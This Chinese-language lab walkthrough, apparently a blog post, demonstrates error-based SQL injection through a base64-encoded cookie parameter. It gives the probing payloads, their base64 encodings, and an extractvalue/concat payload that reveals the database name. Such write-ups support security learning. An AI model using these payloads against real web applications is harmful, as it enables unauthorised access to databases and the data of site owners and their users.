知识点:
- cookie注入
- 报错注入
直接抓取对应的数据包,发现还是一个cookie注入
参数值被base64加密了

测试这里使用什么手段读取输入
构造payload:uname=1'
base64加密:MSc=
出现了hacker的页面,说明信息错误但是单引号没起作用

使用双引号试一下
构造payload:1"
base64加密:MSI=
出现了语法错误的报错信息,说明这里使用了双引号进行读取输入

测试是否可以进行错误注入
构造payload:1" or exp(710)#
base64加密:MSIgb3IgZXhwKDcxMCkj
成功回显exp()的错误信息

接下来获取数据库名
构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#
base64加密:MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj
成功获取到了数据库名;收工

10
本文讲述了作者通过逐步分析和构造payload,利用cookie注入和base64编码对系统进行测试,成功实现错误注入并获取数据库名的过程,展示了攻击者在Web应用安全中的渗透尝试。
6314

被折叠的 条评论
为什么被折叠?



